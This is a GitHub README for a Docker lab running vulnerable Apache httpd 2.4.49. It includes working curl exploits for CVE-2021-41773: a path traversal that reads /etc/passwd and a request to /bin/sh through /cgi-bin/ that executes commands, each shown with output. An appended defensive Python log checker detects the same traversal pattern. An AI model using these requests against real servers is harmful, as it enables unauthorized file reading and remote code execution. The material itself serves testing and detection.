GitHub - blasty/CVE-2021-41773: CVE-2021-41773 playground
source link: https://github.com/blasty/CVE-2021-41773

CVE-2021-41773 Playground
This is a small Docker recipe for setting up a Debian bookworm-based container running an instance of Apache HTTPd 2.4.49 that is vulnerable to CVE-2021-41773.
CGI has been explicitly enabled so the container can be used to test/verify both the local file disclosure behavior and the remote command execution behavior.
Usage
$ docker-compose build && docker-compose up
Local File Disclosure
$ curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
Remote Code Execution
$ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
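As an added defender-side example (not part of blasty's repository), the following Python checker flags the request pattern shown above in Apache access-log lines: any path segment that percent-decodes to `..` without being a literal `..`, which is exactly the form httpd 2.4.49's path normalization failed to collapse. It goes slightly beyond the page by decoding repeatedly until stable and by tagging hits that traverse out of `/cgi-bin/` as possible command execution rather than file disclosure; the log lines and IP addresses are constructed, and the `/cgi-bin/` ScriptAlias prefix is assumed to match the container's default configuration.

```python
import re
from urllib.parse import unquote

# Constructed Apache "combined" access-log lines (not real traffic): the two
# README requests, a benign request under /icons/, and a literal-dotdot request.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Oct/2021:12:00:00 +0000] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1431 "-" "curl/7.74.0"',
    '10.0.0.5 - - [05/Oct/2021:12:00:01 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 200 54 "-" "curl/7.74.0"',
    '10.0.0.7 - - [05/Oct/2021:12:00:02 +0000] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [05/Oct/2021:12:00:03 +0000] "GET /docs/../index.html HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable (bounded), so differently encoded
    spellings of the same segment compare equal."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def encoded_dotdot_segments(raw_path):
    """Segments that decode to '..' without being a literal '..'. httpd
    collapses a literal '..' during normalization; the encoded form is what
    2.4.49 failed to normalize, so only that form counts as traversal."""
    path = raw_path.split("?", 1)[0]
    return [s for s in path.split("/") if s != ".." and fully_decode(s) == ".."]

def classify(line):
    """None for a benign line, otherwise a dict describing the finding."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = encoded_dotdot_segments(m["path"])
    if not hits:
        return None
    decoded = fully_decode(m["path"].split("?", 1)[0])
    # Traversal out of the ScriptAlias'd /cgi-bin/ (assumed prefix) means the
    # resolved target is executed as CGI rather than read, as in the README's POST.
    kind = "rce" if decoded.startswith("/cgi-bin/") else "file_disclosure"
    return {"ip": m["ip"], "method": m["method"], "status": int(m["status"]),
            "kind": kind, "decoded_path": decoded, "segments": hits}

def scan(lines):
    """Findings for every log line carrying an encoded-dot traversal."""
    return [f for f in map(classify, lines) if f]
```

The `status` field is kept in each finding so a responder can tell an attempt that was served (200) from one that was rejected; a literal `../` in the raw request is deliberately not flagged, since httpd normalizes it before mapping the path.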